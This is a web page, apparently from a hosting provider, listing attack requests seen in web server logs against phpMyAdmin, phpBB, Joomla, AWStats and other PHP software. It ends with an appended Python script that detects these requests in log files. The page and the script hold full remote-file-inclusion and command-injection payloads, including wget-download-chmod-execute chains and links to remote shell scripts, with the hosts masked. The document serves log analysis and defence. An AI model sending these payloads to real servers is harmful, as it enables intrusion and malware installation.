
System: WWW Hacker Activity


At any given time there are thousands of computers sending out requests designed to compromise a web server or website by exploiting vulnerabilities in various software packages and programming languages. This comes on top of brute-force ssh attacks and other non-HTTP techniques.

The difference between now and earlier years is that many of these computers have actually been compromised themselves and turned into 'zombie' servers controlled by yet another server and so on. The 'controller' of a zombie network may receive notification when a server has been compromised, or the system could be completely automated and designed simply to spread as far as possible.

The following entries will give you an idea of what kind of exploits are about and what to look for in your webserver logs. If you're not running the targeted software packages then you (probably) don't need to be too concerned. You may still want to use mod_rewrite to send a 403 Forbidden or similar response, but that would just be to reduce bandwidth.

If you are running one or more of these packages then make sure you keep up to date with upgrades and patches. Where possible we've included a link to the product homepage and/or security announcements.

Note: This list is by no means comprehensive and should be used for information purposes only.

PHPMyAdmin

Target
PHPMyAdmin
Files Requested
/PMA/main.php
/admin/main.php
/admin/mysql/main.php
/admin/phpmyadmin/main.php
/admin/pma/main.php
/db/main.php
/dbadmin/main.php
/main.php
/myadmin/main.php
/mysql-admin/main.php
/mysql/main.php
/mysqladmin/main.php
/phpMyAdmin-2.2.3/main.php
/phpMyAdmin-2.2.6/main.php
/phpMyAdmin-2.5.1/main.php
/phpMyAdmin-2.5.4/main.php
/phpMyAdmin-2.5.6/main.php
/phpmyadmin/main.php
/phpmyadmin2/main.php
/web/phpMyAdmin/main.php
/PMA/read_dump.php
/db/read_dump.php
/dbadmin/read_dump.php
/myadmin/read_dump.php
/mysql/read_dump.php
/mysqladmin/read_dump.php
/phpMyAdmin%202.6.4-pl4/read_dump.php
/phpMyAdmin%202.7.0-beta1/read_dump.php
/phpMyAdmin%202.7.0-pl1/read_dump.php
/phpMyAdmin%202.7.0-rc1/read_dump.php
/phpMyAdmin%202.7.0/read_dump.php
/phpMyAdmin-2.2.3/read_dump.php
/phpMyAdmin-2.2.7-pl1/read_dump.php
/phpMyAdmin-2.5.6/read_dump.php
/phpMyAdmin-2.5.7-pl1/read_dump.php
/phpMyAdmin-2.6.0-pl3/read_dump.php
/phpMyAdmin-2.6.0/read_dump.php
/phpMyAdmin-2.6.1-pl3/read_dump.php
/phpMyAdmin-2.6.3-pl1/read_dump.php
/phpMyAdmin-2.6.4/read_dump.php
/phpadmin/read_dump.php
/phpmyadmin/read_dump.php
/phpmyadmin1/read_dump.php
/phpmyadmin2/read_dump.php
/typo3/phpmyadmin/read_dump.php
/web/phpMyAdmin/read_dump.php
/xampp/phpmyadmin/read_dump.php
Payload
None - there's probably a follow-up scan/attack
Security
http://www.phpmyadmin.net/home_page/security.php

Various PHP applications

Target
Various PHP applications - seems to be an extension of the Mambo exploit below, but with more target files
Files Requested
/DE/index2.php
/FR/index2.php
/NL/index2.php
/US/index2.php
/cms/index.php
/cms/index2.php
/cvs/index.php
/cvs/index2.php
/index.php
/index2.php
/mambo/index.php
/mambo/index2.php
/mb/index.php
/mb/index2.php
/site/index2.php
/v1/index2.php
/v2/index2.php
/v3/index2.php
Payload
POST data

phpBB

Target
phpBB
Files Requested
/modules/Forums/admin/admin_styles.php
/Forums/admin/admin_styles.php
/includes/functions.php
/includes/functions_nomoketos_rules.php
/modules/Forums/admin/admin_mass_email.php
/modules/Forums/admin/index.php
Payload
phpbb_root_path=http://XXX.XXX.XX.XX/cmd.dat?
cmd=cd%20/tmp;wget%20XXX.XXX.XX.XX/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|
Security
http://www.phpbb.com/security/

Coppermine

Target
Coppermine
Files Requested
/modules/coppermine/themes/default/theme.php
Payload
THEME_DIR=http://XXX.XXX.XX.XX/cmd.gif?
cmd=cd%20/tmp;wget%20XXX.XXX.XX.XX/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|

Mambo/Joomla Content Management System

Target
Mambo Content Management System
Joomla Content Management System
Files Requested
/index.php
/index2.php
/mambo/index2.php
/cvs/index2.php
/cvs/mambo/index2.php
/php/mambo/index2.php
/cbcms/mod_cbsms_messages.php
/components/com_extcalendar/admin_events.php
/components/com_forum/download.php
/components/com_galleria/galleria.html.php
/components/com_hashcash/server.php
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php
/components/com_loudmounth/includes/abbc/abbc.class.php
/components/com_pcchess/include.pcchess.php
/components/com_pccookbook/pccookbook.php
/components/com_performs/performs.php
/components/com_pollxt/conf.pollxt.php
/components/com_rsgallery2/rsgallery.html.php
/components/com_smf/smf.php
/components/com_simpleboard/file_upload.php
/components/com_sitemap/sitemap.xml.php
/components/com_videodb/core/videodb.class.xml.php
/mod_cbsms_messages.php
Payload
_REQUEST[option]=com_content
_REQUEST[Itemid]=1
GLOBALS=
mosConfig_absolute_path=http://XXX.XXX.XX.XX/cmd.gif?
cmd=cd%20/tmp;wget%20XXX.XXX.XX.XX/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|
CONFIG_EXT[LANGUAGES_DIR]=http://XXX.XXX.XXX/components/com_extcalendar/upload/Thehacker?&cmd=id
phpbb_root_path=http://XXX.XXX.XXX/components/com_extcalendar/upload/Thehacker?&cmd=id
Security
http://forum.mamboserver.com/forumdisplay.php?f=216

Wordpress, Drupal and other PHP applications

Target
Wordpress, Drupal and other PHP applications
Files Requested
/blog/xmlrpc.php
/blog/xmlsrv/xmlrpc.php
/blogs/xmlsrv/xmlrpc.php
/drupal/xmlrpc.php
/phpgroupware/xmlrpc.php
/wordpress/xmlrpc.php
/xmlrpc.php
/xmlrpc/xmlrpc.php
/xmlsrv/xmlrpc.php
Payload
POST data
Security
http://www.php.net/

AWStats

Target
AWStats
Files Requested
/awstats/awstats.pl
/cgi-bin/awstats.pl
/cgi-bin/awstats/awstats.pl
Payload
configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20XXX%2eXXX%2eXX%2eXX%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|
Security
http://awstats.sourceforge.net/awstats_security_news.php

Microsoft Applications/Extensions

Target
Microsoft Applications/Extensions (may be benign)
Files Requested
/5c/_vti_bin/owssvr.dll
/5c/MSOffice/cltreq.asp
Payload
UL=1&ACT=4&BUILD=6551&STRMVER=4&CAPREQ=0

Note: The following exploits were ALL attempted on various sites on our server from the same IP address on 29 March 2007, with the User Agent "Morfeus Fucking Scanner", which seems to be some kind of high-powered PHP-exploiting robot.

DBImageGallery

Target
DBImageGallery
Files Requested
/admin/attributes.php
/admin/images.php
/admin/scan.php
/includes/attributes.php
/includes/db_utils.php
/includes/images.php
/includes/utils.php
/includes/values.php
Payload
donsimg_base_path=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
Security
http://www.dbscripts.net/imagegallery/history.php

DBGuestbook

Target
DBGuestbook
Files Requested
/includes/guestbook.php
/includes/utils.php
/includes/views.php
Payload
dbs_base_path=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/

Ultimate Fun Book

Target
Ultimate Fun Book
Files Requested
/board//function.php
/funboard/function.php
/function.php
Payload
gbpfad=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/

Back-End.org CMS

Target
Back-End.org CMS
Files Requested
/BE_config.php
Payload
_PSL[classdir]=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/

Sinapis Forum CMS

Target
Sinapis Forum CMS
Files Requested
/sinapis.php
/forum//sinapis.php
/FO/sinapis.php
Payload
fuss=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
Security

Admin Phorum

Target
PhpForums Admin Phorum
Files Requested
/actions/del.php
Payload
include_path=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/

eFiction

Target
eFiction
Files Requested
/bridges/SMF/logout.php
/get_session_vars.php
Payload
path_to_smf=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/

PMB Services

Target
PMB Services
Files Requested
/cnl_prod/pmb/opac_css/includes/resa_func.inc.php
/pmb/opac_css/includes/resa_func.inc.php
/opac_css/includes/resa_func.inc.php
Payload
class_path=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/

AgerMenu

Target
AgerMenu
Files Requested
/example/inc/top.inc.php
Payload
rootdir=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/

Fast Click

Target
Fast Click
Files Requested
/fclick/show.php
Payload
path=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/

FCRing

Target
FCRing
Files Requested
/fcring.php
Payload
s_fuss=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/

PHP-MIP

Target
PHP-MIP
Files Requested
/php/top.php
/phpmip//top.php
/top.php
Payload
laypath=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/

SendStudio

Target
SendStudio
Files Requested
/sendstudio/admin/includes/createemails.inc.php
/sendstudio/admin/includes/send_emails.inc.php
Payload
ROOTDIR=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/

Not Yet Classified

/forum/index.php?func=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
/index.php?func=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
/index.php?page=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
/live/help.php?css_path=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
/modules/My_eGallery/public/displayCategory.php?adminpath=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
/phorum/common.php?db_file=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
/skins/advanced/advanced1.php?pluginpath[0]=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
/ubbthreads/addpost_newpoll.php?addpoll=preview&thispath=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/

Note: The following exploits were attempted by user agent Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0) - from Russia with love.

/components/com_simpleboard/file_upload.php?sbp=http://XXXXXX.ru/r57.txt?
/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://XXXXXX.ru/r57.txt?
/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://XXXXXX.ru/r57.txt?
/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://XXXXXX.ru/r57.txt?
/modules/MambWeather/Savant2/main.php?mosConfig_absolute_path=http://XXXXXX.ru/r57.txt?
/components/com_joomlaboard/file_upload.php?sbp=http://XXXXXX.ru/r57.txt?
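As an added example (editor's code, not part of the original page), here is a small Python checker that applies the patterns catalogued above to Apache combined-format log lines: a query parameter set to a remote URL (the remote-file-inclusion form behind the mosConfig_absolute_path, phpbb_root_path and M.txt entries), a fetch-and-run shell chain of the cd /tmp; wget; chmod kind, a request for one of the listed probe files, and the Morfeus user agent. The log lines and RFC 5737 addresses are constructed; M.txt, cmd.gif, micu and mirela are the placeholder names the page itself records.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-log lines modelled on requests catalogued above; RFC 5737 addresses stand in for XXX.XXX.XX.XX.
SAMPLE_LOG = """\
203.0.113.5 - - [29/Mar/2007:10:01:02 +0000] "GET /includes/utils.php?dbs_base_path=http://203.0.113.9/~lisir/M.txt?&/ HTTP/1.1" 200 512 "-" "Morfeus Fucking Scanner"
203.0.113.6 - - [29/Mar/2007:10:01:05 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20203%2e0%2e113%2e9%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1" 404 221 "-" "Mozilla/4.0"
203.0.113.7 - - [29/Mar/2007:10:03:40 +0000] "GET /phpmyadmin/main.php HTTP/1.0" 404 210 "-" "-"
203.0.113.8 - - [29/Mar/2007:10:04:02 +0000] "GET /index2.php?mosConfig_absolute_path=http://203.0.113.9/cmd.gif?&cmd=cd%20/tmp;wget%20203.0.113.9/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP/1.1" 200 301 "-" "Mozilla/4.0"
198.51.100.2 - - [29/Mar/2007:10:05:11 +0000] "GET /blog/?p=12 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')  # ip, time, method, target, status, UA
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.I)  # remote file inclusion: some_path_param=http://...
SHELL_CMD = re.compile(r'(?:^|[;|`])\s*(?:cd\s+/tmp|wget\s|curl\s|chmod\s|\./\w)', re.I)  # fetch-and-run chain
PROBE_FILES = {'main.php', 'read_dump.php', 'xmlrpc.php', 'awstats.pl', 'admin_styles.php'}  # scanner-probed files listed above

def query_params(query):
    """Split the raw query on '&' only: ';' is part of the injected shell payloads, not a separator."""
    for pair in query.split('&'):
        name, _, value = pair.partition('=')
        yield unquote_plus(name), unquote_plus(value)

def classify(line):
    """Return (client_ip, [labels]) for one log line, or None if it is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, _ts, _method, target, _status, ua = m.groups()
    path, _, query = target.partition('?')
    labels = []
    for name, value in query_params(query):
        if REMOTE_URL.match(value):
            labels.append(f'rfi:{name}')
        if SHELL_CMD.search(value):
            labels.append(f'cmd:{name}')
    if path.rsplit('/', 1)[-1] in PROBE_FILES:
        labels.append('probe-path')
    if 'Morfeus' in ua:  # the scanner user agent recorded above
        labels.append('scanner-ua')
    return ip, labels

def scan(log_text):
    """Aggregate labels per client IP, keeping only clients that triggered at least one rule."""
    hits = {}
    for line in log_text.splitlines():
        result = classify(line)
        if result and result[1]:
            hits.setdefault(result[0], set()).update(result[1])
    return {ip: sorted(labels) for ip, labels in hits.items()}
```

A hit that returned 200 rather than the 404 a missing package would produce is the line worth investigating first.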
